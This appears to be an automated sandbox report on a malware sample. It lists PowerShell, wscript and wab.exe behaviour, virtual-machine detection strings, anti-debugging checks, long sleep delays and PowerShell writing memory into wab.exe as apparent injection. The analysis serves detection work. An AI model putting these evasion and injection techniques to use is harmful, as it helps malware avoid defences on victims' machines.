Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service
Source: C:\Program Files (x86)\Windows Mail\wab.exe API/Special instruction interceptor: Address: 4B40EE3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 16_2_0040DD85
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6053 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3812 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5527 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4278 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 3468 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 5525 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: foregroundWindowGot 1759 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe API coverage: 9.6 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4608 Thread sleep time: -6456360425798339s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2128 Thread sleep count: 5527 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2064 Thread sleep count: 4278 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1708 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1916 Thread sleep count: 3468 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5648 Thread sleep count: 31 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5608 Thread sleep count: 5525 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 5608 Thread sleep time: -16575000s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread sleep count: Count: 3468 delay: -5 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20EA10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 11_2_20EA10F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20EA6580 FindFirstFileExA, 11_2_20EA6580
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0040AE51 FindFirstFileW,FindNextFileW, 16_2_0040AE51
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 17_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 17_2_00407EF8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 18_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 18_2_00407898
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00418981 memset,GetSystemInfo, 16_2_00418981
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: wscript.exe, 00000000.00000003.2152753162.000001326F926000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: est Service InterfacevmicheartbeatHyper-V Data Exchange ServiceHyper-V Remote Desktop Virtualization Servicevmic)3
Source: wscript.exe, 00000000.00000003.2152834117.000001326F949000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}
Source: wscript.exe, 00000000.00000003.2152753162.000001326F903000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2156513364.000001326F912000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2153017346.000001326F90D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2152946040.000001326F90C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155382787.000001326F90F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2153515152.000001326F90E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Win32_ServiceStoppedOKvmicvmsessionvmicvmsessionProvides a mechanism to manage virtual machine with PowerShell via VM session without a virtual network.Share ProcessManualNormalC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -pLocalSystemHyper-V PowerShell Direct ServiceHyper-V PowerShell Direct ServiceWin32_ServiceWin32_ComputerSystemuser-PCvmicvmsession
Source: wab.exe, 0000000B.00000002.3429074546.00000000050B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWq
Source: wscript.exe, 00000000.00000003.2152753162.000001326F903000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2156513364.000001326F912000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2153017346.000001326F90D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2152946040.000001326F90C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155382787.000001326F90F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2153515152.000001326F90E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: wab.exe, 0000000B.00000002.3429074546.0000000005068000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3429074546.00000000050B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.2152834117.000001326F949000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\ 'A[
Source: bhv88BF.tmp.16.dr Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
Source: wscript.exe, 00000000.00000002.2156615721.000001326F939000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: est Service InterfacevmicheartbeatHyper-V Data Exchange ServiceHyper-V Remote Desktop Virtualization Servicevmic
Source: powershell.exe, 00000002.00000002.2604863552.000001DB95C2E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

barindex
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_079C73B0 LdrInitializeThunk, 5_2_079C73B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20EA60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_20EA60E2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 16_2_0040DD85
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 16_2_004044A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20EA4AB4 mov eax, dword ptr fs:[00000030h] 11_2_20EA4AB4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20EA724E GetProcessHeap, 11_2_20EA724E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20EA60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_20EA60E2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20EA2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_20EA2B1C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20EA2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_20EA2639

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Yara match File source: amsi64_1908.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 1908, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3892, type: MEMORYSTR
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3BA0000 Jump to behavior
